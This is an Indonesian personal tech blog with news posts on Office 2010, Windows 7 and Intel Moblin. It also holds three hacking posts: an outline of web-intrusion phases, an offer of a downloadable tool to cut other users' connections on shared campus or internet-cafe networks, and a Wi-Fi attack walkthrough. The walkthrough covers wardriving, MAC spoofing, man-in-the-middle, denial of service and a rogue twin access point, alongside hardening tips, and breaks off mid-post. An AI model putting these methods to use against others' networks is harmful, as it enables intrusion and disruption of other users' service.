Welcome To My Smart Side

Microsoft Office 2010

2009-10-20T21:56:00.000-07:00

Microsoft, sejak Rabu (08/10) kemarin, telah merilis Office 2010 edisi Starter dengan fungsi basic document viewing dan fungsi editing, secara gratis. Dalam blog-nya, Takeshi Numoto, vice president corporate Office, mengatakan bahwa Office Starter 2010 akan ditujukan untuk pembeli PC baru, sebagai gambaran umum Office 2010.

Pengguna yang akan menggunakan Office Starter 2010 dapat membeli product key dari retail partner Microsoft dan upgrade ke versi full Office Home & Student 2010, Office Home & Business 2010, atau Office Professional 2010. Untuk pelanggan Office, Microsoft juga menawarkan teknologi virtualisasi yang diberi nama Click To Run, yang memudahkan user untuk men-download Office 2010 versi trialnya (microsoft.com/office2010), dan menjalankan Office 2010 berdampingan dengan versi lainnya di komputer user.

Di Office 2010, Microsoft telah menjawab complain user berkaitan dengan sulitnya menemukan printah dasar di User Interface Riboon yang ada di versi Office sebelumnya. Office 2010 juga dapat menyatukan fitur ketika dikombinasikan dengan SharePoint Server 2010 atau Microsoft Windows SharePoint Services.

“Perbedaan utama untuk Office 2010 ini adalah fungsi yang ada di belakangnya. Office 2010 plus Sharepoint I adalah kompilasi nyata yang membuat Office ini tampak mengagumkan.” menurut Dave Sobel, CEO Evolve Technologies, perusahaan partner Microsoft.

Anti-Spyware dan Microsoft Security Essential

2009-10-20T21:52:00.000-07:00

Microsoft, pada Selasa (29/09) ini memberikan konfirmasi telah meluncurkan free security software terbarunya yang sempat dikembangkan selama hampir satu tahun. “Microsoft Security Essentials, merupakan software keamanan gratis yang telah dirilis hari ini.” ungkap pihak Microsoft.

Software Microsoft Security Essentials dirilis untuk menggantikan Windows Live OneCare, sebuah software keamanan yang ‘pensiun’ di akhir bulan Juni 20009 lalu. Software Microsoft Security Essentials ini juga sebelumnya pernah diuji dalam versi beta bulan Juni lalu. Microsoft Security Essentials atau yang dulunya dikenal dengan nama Morro, menunjukkan bahwa Microsoft belum akan berkompetisi di market software berbayar.

“Software Microsoft Security Essentials ini akan keluar dari bisnis, tidak akan menjadi seperti aplikasi Symantec ataupun McAfee. Microsoft masih harus membuktikan dirinya di arena software berbayar. Sebagai contoh, Windows Defender, yang juga dirilis secara gratis. Lagipula, software Microsoft Security Essentials ini juga belum menjadi product anti-spyware yang terbaik. Kami juga belajar bahwa Symantec dan lainnya telah membagi informasi soal berbagai ancaman dan resiko keamanan dengan Microsoft sebagai bentuk usaha untuk melindungi semua konsumen. Mungkin dengan masuknya Microsoft ke space keamanan, maka akan mempengaruhi hubungan dengan vendor antivirus lainnya.” menurut pendapat Andrew Storms, direktu keamanan nCircle Network Security.

Software Microsoft Security Essentials gratis ini telah kompatibel dengan system operasi Windows XP, Vista dan Windows 7 dengan kapasitas download 4.7MB dari website Microsoft (microsoft.com/security_essentials/).

RoboT Pengintai AS....

2009-10-20T21:42:00.000-07:00

London - Dua robot mata-mata ini dilahirkan untuk membantu tugas para tentara di medan perang. Memiliki wujud seperti alat untuk olahraga, salah satu robot, yakni robot yang beroda, difungsikan untuk memata-matai musuh dengan cara melemparkannya.

Robot yang berbobot 500g ini dibekali dengan sejumlah perangkat lain seperti kamera dan sensor. Terbuat dari titanium, robot tersebut bisa dilempar oleh tentara ke dalam tempat-tempat di mana musuh bersarang untuk melihat aktivitas mereka.

Robot ini dioperasikan dengan joystick dan juga piranti layar sentuh (hand-held screen). Piranti layar sentuh yang digenggam ini memungkinkan sang operator untuk melihat kelemahan dalam formasi musuh secara real-time atau langsung tanpa membahayakan dirinya.

Sementara itu, robot yang lain berupa helikopter mini yang digerakkan dengan remote control. Dilengkapi dengan 4 kamera berbobot ringan, robot ini mampu berputar-putar di atas posisi musuh.

Robot ini tentunya lebih mumpuni karena memungkinkan pemilik robot melihat aktivitas musuh dengan sudut pandang yang luas melalui foto yang dikirimkan ke monitor atau piranti khusus.

Kedua robot mata-mata itu telah melalui uji coba yang ekstensif dan didemonstrasikan di Defence and Equipment Support, Abbey Wood, London. Dilansir detikINET dari DailyMail, Senin (19/10/2009), robot tersebut bisa digunakan oleh tentara di Afghanistan untuk memata-matai Taliban.

OS Terbaru Dari Intel

2009-10-20T21:13:00.000-07:00

Terbaru dari Intel yaitu Moblin 2.1. Moblin 2.1 ini berbasis Linux, dibuat sebagai preview bagi para pengembang software yang menyediakan banyak user interface dan bagaimana memperbaikinya sesuai dengan Linux Foundation, yang mengelola pengembangan OS. OS ini dapat di-download di situs Web Moblin.

Intel mengumumkan Moblin 2.1 pada Intel Developer Forumon sebagai upgrade-an dari Moblin 2.0. Moblin pada awalnya dikembangkan oleh Intel sebagai sebuah sistem operasi untuk netbook, tetapi dengan Moblin 2.1, Intel mengembangkan OS untuk desktop dan handheld devices seperti mobile Internet devices yang didukung oleh prosesor Atom dan disesuaikan dengan platform hardware masing-masing. Namun versi dari Moblin untuk nettops tidak tersedia untuk di-download.

Intel juga menyesuaikan user interface bagi para pengguna Moblin 2.1 dalam beberapa ukuran yaitu untuk layar netbook, nettops dan handheld devices. Layar Nettops berkisar dari 7 inci sampai 12 inci, sedangkan netbook dapat dilampirkan ke layar yang lebih besar.

Ada dua aAplikasi baru dalam Moblin 2.1 yaitu Moblin Garage dan Moblin Application Installer yang memungkinkan user untuk men-download, menginstal atau menghapus software. Untuk meningkatkan kemampuan kinerjanya, OS tersebut mendukung bluetooth dan data 3G mobile broadband, selain itu juga mendukung platform Trail Pine, yang merupakan platform Intel untuk netbook yang akan datang. Pine Trail ini mengintegrasikan prosesor grafis di dalam CPU Atom.

Moblin telah digunakan untuk menguji OS sebelumnya, termasuk pada Acer Aspire One, Asus Eee PC dan Dell Mini. Awal pekan ini, seorang pejabat Intel mengatakan bahwa perusahaan akan bekerja sama dengan perusahaan hardware untuk menambah kompatibilitas hardware untuk OS. Pada hari Rabu, Dell mulai menawarkan versi Moblin dengan netbook Inspiron Mini 10V.

Variasi Teknik Hacking Web

2009-08-30T03:11:00.000-07:00

Terdapat beberapa cara untuk criminal dapat mengancam jaringan web. Berikut list beberapa aksi teknik hacking :

Reconnaissance
Dalam teknik ini, criminal dapat memperoleh informasi mengenai target system, termasuk username, password, parameter input, program atau bahasa script, tipe server, dan system operasi.

Probe
Dalam fase ini criminal mendeteksi kelemahan system SQL injection termasuk dalam teknik ini dan banyak digunakan untuk menemukan hal tersembunyi dan lubang keamanan yang ada.

Toehold
Criminal akan memproses fase ini ketika penyusup masuk ke dalam system, membangun koneksi, biasanya menyerang session, mencari informasi system dan mulai mengeksploitasi kelemahan keamanan.

Advancement
Fase ini criminal akan mencari konfigurasi error dan mengubah ke account user yang masih unprivileged menjadi priilege, atau bergerak dari normal user dengan sedikit izin akses menjadi administrator, dimana setelah itu criminal akan mendapatkan full akses untuk membuat, menghapus, memodifikasi, menerima atau memindahkan file dan informasi.

Stealth
Langkah stealth ini berupa penyamaran keberadaan penyusup yang sudah masuk ke system. Langkah tersebut dilakukan dengan mengakses dan memodifikasi log file untuk menghilangkan bukti yang dapat memberitahukan user mengenai serangan tersebut.

Listening Port
Dalam listening port tersebut, penyusup akan mengeset backdoor, yakni program ‘jahat’ yang akan memastikan aktivitas selanjutnya tidak bisa dilakukan. Program itu dinamakan ‘stealth’, atau tool backdoor, atau sniffer. Selain itu, penyusup juga dapat memberikan informasi yang salah ketika user mengakses file dan memproses jaringan system, dengan tujuan untuk menyamarkan keberadaan user.

Takeover
Digunakan untuk memperluas control dari satu system ke system lain di jaringan yang sama. Penyusup dapat menggunakan sniffer untuk mendeteksi informasi di host lain, seperti username dan password. Step ini dapat digunakan untuk menemukan host computer yang belum terkena hack sehingga penyusup dapat mengakses host lain. Step ini umumnya dilakukan dengan bahasa pemrograman yang simpe dan dikontrol oleh programmer.

Hebat, Printer Bisa Cetak Tanpa Tinta dan Listrik

2009-08-30T03:10:00.000-07:00

Jika biasanya hardware printer menggunakan arus listrik dan juga tinta, namun di masa depan mungkin tidak akan ditemui printer seperti itu lagi. Dalam kompetisi desain Greener Gadget, printer RITI merupakan printer eco-friendly yang akan hit market printer computer dengan segera.

Printer RITI menggunakan ampas kopi atau teh untuk membuat printout computer. Untuk menggunakan printer RITI tersebut, masukkan selembar kertas, tempatkan ampas kopi atau teh ke dalam casing tinta di bagian atas printer. Lalu gerakkan casing tinta ke kiri dan kanan untuk mencetak gambar. Semuanya dilakukan tanpa menggunakan listrik, menurut laporan dari Greener Gadget.

Oleh karena printer RITI hanya bekerja secara manual, maka printer tersebut tidak ideal untuk project besar, dan hanya dapat mencetak hitam dan putih. Namun, secara keseluruhan printer RITI tersebut lebih hemat biaya pembelian tinta dan penggunaan listrik.

Ini Dia Kelemahan Pertama XP Mode di Windows 7

2009-08-30T03:07:00.000-07:00

Sebuah pertentangan telah muncul antara vendor antivirus Sophos dan Microsoft berkaitan dengan patch dan sulitnya manajemen dari XP Mode di Windows 7. Teknologi Windows 7 XP mode tersebut digunakan untuk mempermudah jalannya aplikasi yang biasa ada di XP untuk dijalankan secara virtual di Windows 7. Namun, pertentangan muncul dari Richard Jacobs , CTO dari Sophos, yang mengungkapkan bahwa penawaran dari Microsoft tersebut nantinya memang akan kompatibel dengan banyak aplikasi, namun tidak sarat dengan keamanan...........

Dengan memberikan kemudahan path migrasi dari XP ke Windows 7, dan melewati Vista, Microsoft telah membuat bencana keamanan yang besar, tambah Jacobs. XP Mode merupakan tool independent dari Windows, yang dapat digunakan untuk share folder lama dan device di komputer dengan instalasi Windows 7. Salah satu hal yang tidak di-share adalah processor dan memory, jadi sekaligus juga tidak men-share setting security, keamanan software, patch dan sebagainya, bahkan tidak ada ‘warisan’ setting keamanan dari system baru yang ditumpanginya.

Ketika user menggunakan XP Mode tersebut, user perlu untuk melakukan patch copy XP ke Windows 7. User perlu mengatur setting secara terpisah, termasuk konfigurasi dua firewall personal dan menginstal dua copy software anti malware. Jacobs menambahkan, masalahnya akan semakin buruk ketika user tidak tahu bagaimana mengatur XP Mode virtual tersebut di desktop dan karena tidak adanya tool yang mengatur proses tersebut dari Microsoft.

Sementara respon berbeda diluncurkan oleh penasehat keamanan Microsoft, Roger Halbheer, yang membeberkan bahwa XP Mode berlaku sebagai mesin temporer yang memperbolehkan konsumen untuk menikmati keuntungan keamanan yang lebih baik dari Windows 7, dan seklaigus menikmati kompatibilitas aplikasi yang ada di XP.

Office 2010 Tidak Support Chrome dan Opera

2009-08-30T03:03:00.000-07:00

Jika lebih sering memakai browser Google Chrome atau Opera, maka mungkin tidak bisa berharap banyak dari hadirnya Office Web Apps dari Microsoft, yang dijadwalkan akan hadir bersama Office 2010 di tahun depan. Bulan Oktober lalu, ketika Microsoft mengumumkan akan adanya kompetisi browser di Google Docs dan Spreadsheet, maka Office Web Apps dipastikan akan kompatibel hanya untuk browser web yang ‘familiar’.

Sementara itu, Microsoft tidak familiar dengan Google Chrome ataupun Opera, Internet Explorer 6 ataupun Apple Safari versi Windows. Menurut Microsoft, kesemua browser tersebut tidak ada di list browser yang support Office Web Apps. Official support untuk Office Web Apps hanya terbatas untuk browser Internet Explorer 7 dan 8, Firefox 3.5 di Windows, Mac, dan Linux, juga Safari 4 di Mac.

“Jika user memilih menggunakan browser lain, maka user harus masih mencobakannya dengan Web Apps. Sementara kami tidak bisa men-support semua browser, maka konsumen tidak akan diblokir ketika akan menggunakan mereka. Inilah tujuan dari dibentuknya Web Aps untuk kompatibilitas dan pencapaian yang lebih luas.” ulas pihak Microsoft. Berita ini juga sempat mengecewakan pihak Opera, yang kemudian berniat memperluas support-nya untuk menyambut Web Apps tersebut.

Windows 7 Bisa Bikin Boros Baterai Netbook

2009-08-30T03:01:00.000-07:00

Baterai yang tahan lama umumnya menjadi salah satu keunggulan dari netbook. Namun, untuk netbook dengan system Windows 7 rupanya tidak mendukung kemampuan daya tahan baterai tersebut. Menurut Tom Hardware, Windows 7 akan menghabiskan satu per tiga daya tahan baterai lebih banyak, bila dibandingkan dengan perangkat yang sama dengan system Windows XP.

Dalam uji cobanya, situs tersebut menggunakan perangkat netbook Acer Aspire One dengan system Windows 7 dimana hasilnya menyebabkan daya tahan baterai berkurang hingga 2.5 jam, bila dibandingkan system operasi Windows XP SP3. Perbandingan tersebut jika fungsi konsumsi listrik rendah keduanya diaktifkan.

Dari hasil tersebut disimpulkan bahwa system Windows 7 dapat dengan cepat memakan daya baterai apalagi ketika dijalankan di netbook Apple MacBook. Padahal sebelumnya, Microsoft berjanji akan meningkatkan kekuatan baterai sebesar 11 persen lebih banyak dibandingkan Windows Vista. Selain itu, akan ditambah kemampuan untuk memutar DVD, dan mampu mengubah status CPU dalam kondisi diam ketika tidak digunakan dalam waktu tertentu agar lebih efisien. Walaupun begitu, pihak Microsoft belum memberikan komentar lebih lanjut mengenai hal ini.

Inilah List Kelemahan Mac OS X 10.6 Snow Leopard

2009-08-30T02:55:00.000-07:00

Dengan hadirnya system operasi Mac OS X 10.6 Snow Leopard, ternyata tidak semua aplikasi kompatibel dengan system tersebut, dan justru mengalami trouble ketika mengaplikasikannya. Aplikasi tersebut termasuk Adobe Photoshop Elements, Macromedia FreeHand MX, Cocktail, iStat Menus, FruitMenu, SilverKeeper, WireTap, dan sebagainya. Berikut beberapa aplikasi yang tidak kompatibel dengan Mac OS X 10.6 Snow Leopard (selengkapnya dapat melihat snowleopard.wikidot.com) :

* Game kisah mistery The Abbey
* Adobe Photoshop Elements versi Elements 6 untuk Macintosh
* Free management utility Afloat

# aMSN, cloning free open source MSN Messenger
# AppleJack, free troubleshooting utility untuk dijalankan di modus Single User
# Backup Bouncer, utility backup-software
# Books, aplikasi buku open source plus donasi
# Chax, utility iChat plus donasi
# CheckPoint SecureClient untuk VPN client
# ClamXav, free virus checker berbasis ClamAV
# Cocktail, utility maintenance
# ConceptDraw Pro, aplikasi pembuat diagram
# CuteFTP untuk FTP client
# CyberDuck untuk FTP, SFTP, WebDAV, Cloud Files dan Amazon S3 Browser
# Data Backup
# DAVE untuk file dan print sharing
# DiskWarrtior 4.1 untuk recovery file
# DynDNS untuk layanan DNS
# Electric Sheep aplikasi artwork
# Fallout II, game yang mengalami kerusakan video di system ini
# Tidak ada upgrade Forklift - FTP, SFTP, Amazon S3, WebDAV, SMB, NISm dan AFP
# FreeNX, remote display berbasis NX Server
# FruitMenu, aplikasi kustomisasi menu
# Google Gears
# info.xhead, utility database personal
# Inquisitor, pendukung pencarian web
# iStat Menus, utility system-info
# Leopard Cache Cleaner, utility maintenance system
# Line 6 Monkey, auto-updater untuk aplikasi music
# Linkinus untuk IRC client
# Macromedia FreeHand MX 11.0.2, aplikasi ilustrasi
# Magical, aplikasi pengganti jam dan calendar
# MailTags, organizer Apple Mail
# Max 5, software music
# MenuMeters, system monitoring
# Nambu, utility social-networking
# PGP Desktop dan PGP Whole Disk Encryption

Menggali Fenomena Maraknya Hotspot

2009-08-30T02:53:00.000-07:00

Sudah bukan hal baru lagi bagi kita saat melihat pengunjung mall dengan antusias melahap berita dari Internet melalui laptop di depannya, dengan hanya ditemani sebotol teh atau camilan. Atau sekelompok mahasiswa yang menghabiskan waktunya di lingkungan kampus demi 'gratisan' Internet setiap hari. Namun jika kita cermati dengan baik, sebenarnya apakah sasaran utama dari penyediaan layanan ini pada ruang publik kita?

Memang ada banyak sekali alasan untuk suatu pihak memasang hotspot pada lokal area bisnisnya. Sebut saja kampus, karena institusi pendidikan ini mempunyai tujuan paling ‘mulia’ dalam pemasangan hotspot. Tujuan utama suatu kampus dalam menyediakan layanan hotspot tentu saja untuk memperluas akses civitas akademikanya terhadap informasi global melalui Internet, disamping mungkin juga mengembangkan komunitas e-learning yang mereka miliki. Walaupun tidak bisa dipungkiri juga terselip aspek bisnis dalam motivasinya. Namun yang menjadi pertanyaan sekarang adalah sejauh mana ketepatan layanan ini mencapai sasarannya? Benarkah dalam sebuah kampus, era Internet kabel sudah harus digantikan oleh hotspot. Ataukah hanya sekedar sebagai strategi bisnis dalam persaingan dunia pendidikan yang kian ketat?

Seperti yang kita tahu, sejak banyaknya kampus menyediakan layanan hotspot, memang kampus tersebut berhasil menjadi 'rumah kedua' bagi sebagian mahasiswa. Namun sebenarnya untuk alasan apakah mereka betah berlama-lama tinggal di kampus dengan laptop atau PDA-nya, mungkin harus dikaji lebih dalam. Yang jelas tidak sepenuhnya motivasi mereka untuk 'tinggal di kampus' terkait dengan tugas kampus yang harus dikerjakannya. Banyak diantaranya yang memanfaatkannya sekedar karena 'gratis'. Karena seperti yang diketahui bersama, biaya komunikasi di Indonesia, termasuk untuk koneksi Internet, masih relatif mahal jika dibandingkan dengan negara-negara lain. Itulah mengapa para mahasiswa ini lebih memilih 'gratis' di kampus, daripada 'bayar' di luar. Tentu saja semua itu sangat rasional.

Pastinya sebuah kampus sudah mempertimbangkan kemungkinan seperti tersebut di atas, sebelum mereka memutuskan untuk memasang hotspot. Jika sudah dapat menduga, mengapa juga mereka tetap memasangnya? Tak lain adalah karena pertimbangan aspek bisnis, karena seperti yang kita tahu, dunia pendidikan pun saat ini merupakan lahan bisnis yang potensial. Untuk dapat bersaing menjadi sebuah perguruan tinggi papan atas, tentunya tak semata kualitas pendidikan yang harus diperhatikan. Aspek fasilitas kampus merupakan salah satu faktor penentu layak tidaknya sebuah perguruan tinggi disebut 'bergengsi'. Bayangkan jika sebuah perguruan tinggi ternama sekelas UGM atau UI tidak mempunyai hotspot. Apa kata dunia? Itulah mengapa saat ini banyak kampus berlomba memperbaiki infrastrukturnya, termasuk infrastruktur IT-nya.

Lalu bagaimana dengan pemasangan hotspot pada suatu pusat keramaian? Seperti yang banyak kita lihat saat ini, banyak ruang publik yang menyediakan fasilitas hotspot. Untuk yang satu ini, alasannya sangat mudah ditebak, tak lain dan tak bukan adalah aspek bisnis semata. Ya, sebuah ruang publik yang menyediakan hotspot pastilah akan menarik bagi para surfer untuk mendatanginya, dan para surfer ini biasanya berasal dari ekonomi menengah ke atas. Ini merupakan suatu nilai tambah bagi proses marketing suatu pusat keramaian. Entah itu hotspot yang bersifat free hingga hotspot yang berbayar sekalipun kenyataannya tetap merupakan hal yang menarik, apalagi untuk kalangan muda di kota-kota besar, yang didominasi oleh pelajar dan mahasiswa dari berbagai penjuru daerah. Tentu saja mereka merupakan target market yang potensial. Hitung saja sudah berapa pusat perbelanjaan maupun hiburan di sekitar kita yang memasang fasilitas ini, mulai dari Mall hingga kafe-kafe, semua berlomba memperlengkapi diri dengan fasilitas ini. Tak lain hanyalah untuk menarik pengunjung sebanyak mungkin untuk memperlancar bisnis mereka masing-masing.

Jadi sebenarnya hal terpenting dari fenomena maraknya pemasangan hotspot saat ini adalah bukan untuk apa mereka memasangnya, namun bagaimana kita memanfaatkannya. Orang yang memakai layanan tersebut hanya untuk sekedar mengetahui gossip artis dan film terkini tentunya tidak akan mendapat manfaat yang sama dengan orang yang memakainya untuk bekerja melihat harga saham di pasaran terkait dengan berita terbaru kebijakan pemerintah. Begitu juga dengan mahasiswa, walaupun sama-sama mendapat akses gratis di kampus, tergantung dengan bagaimana mereka akan memanfaatkannya.

Jah...Neh Buat si Sotoy.......!!

2009-04-20T23:39:00.000-07:00

Jah......jah....!!pengen curhat dikit neh.....!!,,we punya temen yang sotoy bgt....yang pade sok, g mu bagi2 ilmuna....!!yang padahal tuh ilmu blum seberapa yach malah ngebanggain dirina....!!kalo bagi saya dalam IT ini g da ilmu yang tertinggi dan g da yang g mungkin...smuana bisa dipelajari,,dan bisa dicari kalo kita punya kemauan dan mau bekerja keras......!!jah..jah......liuer pisan euy.....!!

dah jah mukadimahna....males panjang panjang ntar dikatain ge...!!we punya solusi...eits ato lebih tepat mbuat kita seneng deh,,,!! contoh kasusna seperti ini kita mau akses internet tapi lambat...and banyak yang make jaringan...misalkan di kampus2 ato warnet juga bisa kog...neh program buat ngeputusin koneksi orang...dan kita main ndiri deh....!! heu...heu....!!ah we g bisa terlalu banyak ngomong neh,,terlalu susah mbuat nyambungin neh kata2...langsung jah yach....neh program buat ngeputusin koneksi orang download disini jah...ah kalo da masalah dlam programna lapor we jah....!!ato kirim ke email we permasalahanna....!!neh email we..!!greget4n@yahoo.com...!! ato add ym we jah...neh...yoga_tkj2a!! jah bisa chat deh kita kita....!

heu..heu....!!

download here sableng

jah buat temen2 yang masih sama ma saya yang berkuta di bidang IT ato palah namana..yang penting masih memakai media komputer ato memerlukan akses internet...!!tidak ada yang tak mungkin dan tak ada yang tidak ada kalo dah berhubungan dengan IT ato komputer..!! jah tinggal tanya jah ma mbah google....!!tapi pastiin dulu penulisan nama ato program ato pajah yang kita ketahui itu bener and falid..!! jah jah....ketinggian amat uyah..maklum wong deso...!!katrok..and gaptek ge...!! itu lah we.....!!Huft....!!

Do you Now............???

2009-03-30T22:01:00.000-07:00

Lebih baik Gini dari pada.......ikutan.......????

Tanya kenapa....???

Cara Hacking Wi-Fi

2008-12-23T09:26:00.000-08:00

Seorang penyusup bisa menyusup ke dalam sistem menggunakan beberapa program gratisan bisa dengan mudahnya diperoleh di internet. Ia bahkan bisa menaklukkan sebuah jaringan nirkabel hanya dalam beberapa urutan langkah. Dalam serangannya, ia bisa melakukan pemindahan massal terhadap seluruh perangkat jaringan yang diincarnya. Berikut adalah beberapa hal yang biasa dilakukan oleh Attacker untuk menaklukkan sebuah jaringan tanpa kabel : 1. Melacak sinyal dari jarak jauh menggunakan kartu jaringan wireless menggunakan antenna tambahan di luar ruangan. 2. Menjadi anonymous tak dikenal menggunakan firewall bawaan dari produk Microsoft atau peranti lain seperti ZoneAlarm dari Zone Lab untuk melindungi komputernya dari alat pemindai balik IDS (Intrusion Detection System).S 3. Mendapatkan IP Address, target access point, dan server DHCP (Dynamic Host Configuration Protocol) menggunakan aplikasi seperti NetStumbler atau program wireless client lainnya. 4. Mengeksploitasi kelemahan – kelamahan jaringan wireless dengan cara yang tidak jauh beda dengan yang dilakukan oleh penyusup jaringan pada umumnya. Biasanya Attacker mengincar dengan kesalahan-kesalahan umum, misalnya : default IP, default password, dll 5. Dengan bantuan alat protocol analyzer, penyusup melakukan sniff gelombang udara, mengambil contoh data yang ada di dalamnya, dan mencari MAC Address dan IP Address yang valid yang bisa dihubungi. 6. Mencuri data penting dari lalu lintas broadcast untuk memetakan jaringan target. 7. Menggunakan peranti seperti Ethereal untuk membuka data yang didapat dari protokol-protokol transparan seperti Telnet, POP (Post Office Protocol), atau HTTP (HyperText Transfer Protocol) untuk mencari data otentikasi seperti username dan password. 8. Menggunakan program lain, seperti SMAC, untuk melakukan spoofing MAC Address dan menangkap lebih banyak paket data dalam jaringan. 9. Melakukan koneksi ke WLAN target. 10. Memeriksa apakah ia telah mendapatkan IP Address atau tidak. Hal ini dilakukan penyusup secara pasif sehingga sangat sulit dideteksi. 11. Menggunakan alat pemindai kelemahan system dan jaringan untuk menemukan kelemahan pada komputer-komputer pengguna, access point, atau perangkat lainnya. 12. Melakukan eksplorasi jaringan untuk memetakan dan memperpanjang akes ke jaringan Wireless berikutnya. Silahkan... Anda bertanya per-point dari Anatomi tersebut... nanti akan saya bahas 1 per 1... Saya tidak akan membahas apabila terjadi lompatan point (point jump start)... krn akan membuat Anda semakin bingung nantinya..... Ini adalah beberapa ancaman (tread) yang mungkin terjadi di dalam jaringan Wireless Anda....., : Pencurian Identitas Penggunaan Media Access Control (MAC) Address untuk menentukan komputer mana yang berhak mendapatkan koneksi dari jaringan nirkabel sudah sejak lama dilakukan, meskipun sebenarnya tidak memberikan perlindungan yang berarti dalam sebuah jaringan komputer apapun. Penyusup mampu melakukan pencurian identitas dengan teknik spoofing (pencurian) MAC untuk menggandakan Service Set Identifier (SSID) dan MAC Address yang notabene adalah PIN akses jaringan. Penyusup yang berpengalaman mampu menggunakan SSID dan MAC dari komputer lain untuk mengerjai jaringan – mencuri bandwidth atau men-download file, misalnya. Meskipun jaringan telah dilengkapi dengan enkripsi data atau VPN (Virtual Private Network), MAC Address masih bisa dilacak dan di-spoof. Informasi mengenai MAC Address bisa diperoleh dari program seperti Kismet. Untuk melakukan pencurian identitas, penyusup akan menggunakan program spoofing atau secara manual mengubahnya melalui registry (jika pengguna beroperasi pada sistem Microsoft Windows). Man-in-the-Middle Serangan lain yang lebih keren adalah serangan Man-in-the-Middle, mengelabui koneksi VPN antara komputer pengguna resmi dan access point dengan cara memasukkan komputer lain di antara keduanya sebagai pancingan. Si penyusup inilah yang disebut sebagai “man-in-the-middle.” Jenis serangan ini mirip dengan jenis serangan pada jaringan fisik kabel, menggunakan program dan perangkat yang sama kecuali pada perangkat wireless-nya. Dengan menggunakan sebuah program, penyusup mampu memosisikan diri di antara lalu lintas komunikasi data dalam jaringan nirkabel. Penyusup bisa menggunakan software tertentu untuk melakukan serangan ini, contohnya adalah program gratisan seperti Wireless LANJack dan AirJack. Hanya IDS yang mapan dan mampu memonitor 24 jam sehari sajalah yang mampu mendeteksi jenis serangan ini. Denial of Service (DoS) Aksi Denial of Service bisa menimbulkan downtime pada jaringan. Hal ini tentunya menakutkan bagi para administrator jaringan dan pengelola keamanannya. Nah, pada jaringan nirkabel, serangan ini bisa dating dari segala arah. Ada banyak program, seperti Wireless LANJack dan hunter_killer, yang mampu melakukan serangan DoS. Serangan tersebut bisa diarahkan pada sebuah komputer pengguna biasa supaya tidak bisa terkoneksi dengan jaringan, atau terkoneksi ke sebuah access point. Dengan cara ini, tak ada pengguna yang bisa menggunakan layanan jaringan Karena adanya kekacauan lalulintas data. Seorang penyusup mampu mengelabui Extensible Authentication Protocol (EAP) untuk melakukan serangan DoS terhadap suatu server, plus melakukan flooding data. Dengan begitu, tidak ada satu pun pengguna yang bisa melakukan koneksi dengan layanan jaringan. Network Injection Ini adalah teknik DoS baru untuk menginjeksi sebuah jaringan nirkabel, atau sebuah access point-nya saja untuk bisa menguasai keseluruhan jaringan. Jika sebuah access point terhubung dengan jaringan yang tidak terfilter secara baik, maka penyusup akan bisa melakukan aksi boardcast – seperti spanning tree (802.1D), OSPF, RIP, dan HSRP. Dengan begitu, semua perangkat jaringan akan sibuk dan tidak mampu lagi bekerja sesuai dengan semestinya. Serangan routing (routing attack) juga termasuk dalam serangan dalam jenis ini. Seorang penyusup bisa menggunakan program seperti IRPAS untuk melakukan injeksi data pada update routing di jaringan, mengubah gateway, atau menghapus table routing yang ada. Access point yang tidak terlindungi bisa membuka kesempatan serangan jenis ini. Nanti akan saya bahas bagaimana mengatasi ancaman (tread) ini... semoga bisa menjadi bahan pembelajaran utk Anda.... ni adalah beberapa hal terpenting yang harus Anda lakukan demi keamanan Jaringan Wireless yang Anda miliki, ya... minimal mengurangi tingkat kegiatan attaking : 1. Ubah Password Default Access Point. 2. Jika memungkinkan, ubah IP default. (beberapa merk Access Point biasanya sudah disertai fasilitas ini). 3. Aktifkan metode enkripsi, gunakan enkripsi WPA dengan Pre Shared Key (WPA-PSK), dan berikan password yang aman. Bisa juga memanfaat enkripsi WPA dengan Temporal Key Integrity Protokol). 4. Matikan fungsi Broadcast SSID, sehingga SSID Anda tidak terdeksi pada proses War Driving. 5. Lindunngi SSID, dengan cara : merubah nama SSID default dengan nama SSID yang tidak mudah ditebak. 6. Gunakan MAC Address Filtering untuk mengurangi kegiatan penysupan 7. Non Aktifkan DHCP, gunakan IP Static dengan nilai yang jarang diguakan. 8. Gunakan Security tambahan seperti : CaptivePortal atau aplikasi lainnya yang di inject pada firmware Access Point. 9. Access Point Monitoring via Client, ini adalah cara terbaru uuntuk melakukan controlling terhadapa Access Point yang Anda miliki melalui client. Proses ‘IP Block’, ‘Client Resctriction’ dan tentang keamanan lainnya. Salah satu aplikasi yang bias digunakan adalah : Mc Affe Wireless Home Security. ingat.. tidak ada system yg 100% secure... tapi tetaplah berusaha untuk mengamankan aset yang Anda miliki..... WarDriving | SiteSurvey WarDriving | SiteSurvey adalah kegiatan untuk mencari dan mendapatkan SSID yang akan digunakan untuk proses pe-'Nyantolan' bahkan mulai 'internet gratis' sampai proses gainning lainnya. Bagaimana sih proses WarDriving yg seberanya...?? sebenarnya sih simple2 saja...., yaitu : 00. Persiapkan perangkan WarDriving : 001. Laptop 002. WiFi Devices... me sarankan adalah devices yang dengan chipshet ORINOCO, Prism & Prism2. Kenapa harus devices dgn. chipset tersebut? yang pasti jawabannya adalah kompabilitas terhadap aplikasi berbasis Linux.... Wink 003. Antena, kita memerlukan Antena utk meningkatkan signal... sehingga AP yang signalnya lemah masih bisa kita jangkau... dan dan AP yg jaraknya jauh masih bisa di gapai.... kita ga usah pake Antena yg mahal2 dech.... gunakan saja Antena Kaleng (7 -10 dbi)... bisa juga pake Antena paper clip (5 - 7 dbi). 004. Aplikasi WarDriving, bisa pakai : NetStumbler, Kismet, AP Scanning, dll -------------------------------------------------------- Analisis kali ini /me mempergunakan : NetStumbler dikarenakan WiFi yg me miliki tidak support dengan Distro Fedora (-- distro kesayangan me gitu lho...) -------------------------------------------------------- 01. Tentukan area yg ingin Anda jadikan target | sasaran 02. Aktifkan aplikasi WarDriving... /me pake NetStumbler... 03. NetStumbler menditeksi berbagai AP di coverage area.... Apa yang bisa dianalisa : 03.1 MAC Address Nah, Anda bisa mendapatkan informasi ttg MAC Address yang ada. Analisalah : . Perhatikan saja lingkaran kecil yang berwarna hijau saja... itu menujukkan AP active . MAC Address sama dan SSID berbeda ----> kemungkinan Fake AP Porses Hacking yang bisa dilakukan : . untuk sementara /me belum menemukan proses hacking pada analisa ini. 03.2 SSID SSID yang terditeksi adalah SSID dari AP yang value broadcast = Enable |Visible Infromasi yang bisa Anda dapatkan : . Nama SSID dari AP yg berada di coverage area . Kemungkinan juga ditemukan : Nama SSID Default bawaan Pabrik Proses Hacking yang bisa dilakukan : . Membuat AP tandingan dengan SSID yang sama + channel yg sama kalau model hackingnya spt ini, AP aslinya aslinya akan lumpuh.. asalkan AP tandingannya itu memiliki signal yg lebih kuat. . Nah... 